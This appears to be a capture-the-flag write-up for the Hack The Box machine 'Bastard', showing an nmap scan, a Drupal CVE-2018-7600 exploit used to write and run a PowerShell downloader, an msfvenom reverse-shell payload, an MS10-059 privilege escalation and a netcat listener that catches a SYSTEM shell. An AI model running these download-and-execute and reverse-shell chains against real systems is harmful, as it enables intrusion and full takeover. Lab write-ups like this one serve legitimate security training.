Bastard
OS: Windows, Difficulty: Medium, IP: 10.10.10.9
Initial Enumeration
# Nmap 7.70 scan initiated Sat Jul 20 22:32:11 2019 as: nmap -sV -sC -O -A -p 80,135,49154 -oN O-detailed 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 251.65 ms 10.10.14.1
2 251.68 ms 10.10.10.9
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 20 22:33:23 2019 -- 1 IP address (1 host up) scanned in 72.34 seconds
Drupal CVEs
Exploited CVE
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.8 LPORT=9999 -f exe > exploit_rev.exeCreated a simple reverse shell to be delivered to the machine.
Create a PS1 file that will download my exploit to the system
-----------------
./drupa7-CVE-2018-7600.py http://10.10.10.9 -c 'cmd.exe /c "@echo $webclient = New-Object System.Net.WebClient>wget.ps1&@echo $url = "http://10.10.14.8/syst.exe">>wget.ps1&@echo $file = "syst.exe">>wget.ps1&@echo $webclient.DownloadFile($url,$file)>>wget.ps1&@type wget.ps1"'
Execute the PS1 file to actually download the exploit
-----------------
./drupa7-CVE-2018-7600.py http://10.10.10.9 -c 'powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1'
Execute the downlaoded exploit
-----------------
./drupa7-CVE-2018-7600.py http://10.10.10.9 -c 'syst.exe'I caught this reverse shell using meterpreter (exploit/multi/handler)
Got the system information and used Windows Exploit Suggester
./wes.py -d 2019-07-21-mssb.xls -i ../systeminfo | tee ../wes.out
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] doneOnly MS10-059 seemed to work, so I used to earlier mentioned way to deliver the exploit binary and ran it to get shell as NT/System. [This was a reverse shell exploit, so had to catch it using NC]
nc -lvnp 8989
listening on [any] 8989 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.9] 49519
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system User Own
C:\Users\dimitris\Desktop>type user.txt
type user.txt
ba22f***Root Own
C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
4bf12***Learning Outcome
Delivering exploits, WGETs, or any other thing, is a very tedious task, if you do not have a meterpreter staged shell. Apart from that exploit reliability is very finicky. Overall a good box, made me think a little about exploit delivery and sessions management.
Last updated
